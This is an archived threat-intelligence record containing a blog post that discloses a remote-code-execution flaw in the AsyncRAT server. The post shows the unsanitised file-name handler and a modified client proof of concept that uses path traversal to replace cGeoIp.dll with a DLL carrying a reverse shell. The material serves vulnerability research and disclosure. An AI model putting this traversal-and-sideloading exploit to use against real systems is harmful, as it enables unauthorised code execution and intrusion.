{
	"id": "563a4c0b-c108-408d-b73c-0d4cf9bf557f",
	"created_at": "2026-04-06T00:14:16.127217Z",
	"updated_at": "2026-04-10T13:12:25.425669Z",
	"deleted_at": null,
	"sha1_hash": "a3ed0b57ece39911455a46ba11c72876bc9d0e84",
	"title": "AsyncRAT RCE vulnerability",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 326062,
	"plain_text": "AsyncRAT RCE vulnerability\r\nBy Brian Stadnicki\r\nPublished: 2022-03-12 · Archived: 2026-04-05 19:37:35 UTC\r\nAsyncRAT is an open source RAT (Remote Access Tool). While it isn’t typically used for advanced attacks, it’s\r\nvery common in gaming scenes, thanks to how easy to use and surprisingly polished it is. Thankfully, there exists\r\na RCE flaw.\r\nThe AsyncRAT server listens by default on 6606, 7707 and 8808. No authentication is required to connect to a\r\nserver, with commands being sent over a tcp ssl socket connection, with a custom msgpack implementation and\r\ngzip stream compression.\r\nThere are many commands, but since this is written in C#, the easiest attack vector is to sideload a DLL, so the\r\ncommands of interest write a file.\r\nCommand: socketDownload/save\r\n string dwid = unpack_msgpack.ForcePathObject(\"DWID\").AsString;\r\nFormDownloadFile SD = (FormDownloadFile)Application.OpenForms[\"socketDownload:\" + dwid];\r\nif (SD != null)\r\n{\r\n if (!Directory.Exists(SD.DirPath))\r\n return;\r\n string fileName = unpack_msgpack.ForcePathObject(\"Name\").AsString;\r\n string dirPath = SD.DirPath;\r\n if (File.Exists(dirPath + \"\\\\\" + fileName))\r\n {\r\n fileName = DateTime.Now.ToString(\"MM-dd-yyyy HH;mm;ss\") + \"_\" + fileName;\r\n await Task.Delay(100);\r\n }\r\n await Task.Run(() =\u003e SaveFileAsync(unpack_msgpack.ForcePathObject(\"File\"), dirPath + \"\\\\\" + fileName));\r\n SD.Close();\r\n}\r\nAs we can see, the file is saved to the form’s download directory appended with the file name. As there is no\r\nsanitisation for the file name, it is vulnerable to a path traversal attack. The vulnerability is limited by the form\r\ncheck, which results in the vulnerability only working when the attacker is downloading a file. 
This means that\r\nduring a file download, the server is vulnerable.\r\nFor the purposes of this proof of concept, I will exploit it when the client has a file requested. It would be possible\r\nto keep sending a command to exploit this, especially because the connected client doesn’t show in the list view or\r\nlogs until the client sends identification information.\r\nIn order to exploit a dll-sideloading vulnerability, I need to identify a DLL to replace. I choose cGeoIp.dll ,\r\nwhich appears to be used for geolocation of clients from their IP addresses. This DLL is also effective because it is\r\nloaded when the server is started.\r\nThe DLL is included in the project’s resources, so I edit in a C# reverse shell using dnSpy.\r\nFor the exploitation itself, instead of writing a custom client for AsyncRAT, I found it easier to edit the client\r\nitself. Especially because my POC exploits the attacker trying to download a file, so keeping all the features helps\r\nconvince the attacker to continue exploring the client and trigger the vulnerability.\r\nprivate bool infected = false;\r\npublic void DownnloadFile(string file, string dwid)\r\n{\r\n TempSocket tempSocket = new TempSocket();\r\n try\r\n {\r\n if (!infected)\r\n {\r\n infected = true;\r\n MsgPack msgpack = new MsgPack();\r\n msgpack.ForcePathObject(\"Packet\").AsString = \"socketDownload\";\r\n msgpack.ForcePathObject(\"Hwid\").AsString = Connection.Hwid;\r\n msgpack.ForcePathObject(\"Command\").AsString = \"pre\";\r\n msgpack.ForcePathObject(\"DWID\").AsString = dwid;\r\n msgpack.ForcePathObject(\"File\").AsString = \"../../cGeoIp.dll\";\r\n msgpack.ForcePathObject(\"Size\").AsString = new FileInfo(\"cGeoIp.dll\").Length.ToString();\r\n tempSocket.Send(msgpack.Encode2Bytes());\r\n MsgPack msgpack2 = new MsgPack();\r\n msgpack2.ForcePathObject(\"Packet\").AsString = \"socketDownload\";\r\n 
msgpack.ForcePathObject(\"Hwid\").AsString = Connection.Hwid;\r\n msgpack2.ForcePathObject(\"Command\").AsString = \"save\";\r\n msgpack2.ForcePathObject(\"DWID\").AsString = dwid;\r\n msgpack2.ForcePathObject(\"Name\").AsString = \"../../cGeoIp.dll\";\r\n msgpack2.ForcePathObject(\"File\").LoadFileAsBytes(\"cGeoIp.dll\");\r\n tempSocket.Send(msgpack2.Encode2Bytes());\r\n }\r\n MsgPack msgpack = new MsgPack();\r\n msgpack.ForcePathObject(\"Packet\").AsString = \"socketDownload\";\r\n msgpack.ForcePathObject(\"Hwid\").AsString = Connection.Hwid;\r\n msgpack.ForcePathObject(\"Command\").AsString = \"pre\";\r\n msgpack.ForcePathObject(\"DWID\").AsString = dwid;\r\n msgpack.ForcePathObject(\"File\").AsString = file;\r\n msgpack.ForcePathObject(\"Size\").AsString = new FileInfo(file).Length.ToString();\r\n tempSocket.Send(msgpack.Encode2Bytes());\r\n MsgPack msgpack2 = new MsgPack();\r\n msgpack2.ForcePathObject(\"Packet\").AsString = \"socketDownload\";\r\n msgpack.ForcePathObject(\"Hwid\").AsString = Connection.Hwid;\r\n msgpack2.ForcePathObject(\"Command\").AsString = \"save\";\r\n msgpack2.ForcePathObject(\"DWID\").AsString = dwid;\r\n msgpack2.ForcePathObject(\"Name\").AsString = Path.GetFileName(file);\r\n msgpack2.ForcePathObject(\"File\").LoadFileAsBytes(file);\r\n tempSocket.Send(msgpack2.Encode2Bytes());\r\n }\r\n catch\r\n {\r\n tempSocket?.Dispose();\r\n return;\r\n }\r\n}\r\nThe AsyncRAT client has the modified cGeoIp.dll in the same directory. In order to not raise suspicions, the\r\nrequested file is also sent, as the server doesn’t keep track of state.\r\nSource: https://brianstadnicki.github.io/posts/vulnerability-asyncrat-rce/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://brianstadnicki.github.io/posts/vulnerability-asyncrat-rce/"
	],
	"report_names": [
		"vulnerability-asyncrat-rce"
	],
	"threat_actors": [],
	"ts_created_at": 1775434456,
	"ts_updated_at": 1775826745,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a3ed0b57ece39911455a46ba11c72876bc9d0e84.pdf",
		"text": "https://archive.orkl.eu/a3ed0b57ece39911455a46ba11c72876bc9d0e84.txt",
		"img": "https://archive.orkl.eu/a3ed0b57ece39911455a46ba11c72876bc9d0e84.jpg"
	}
}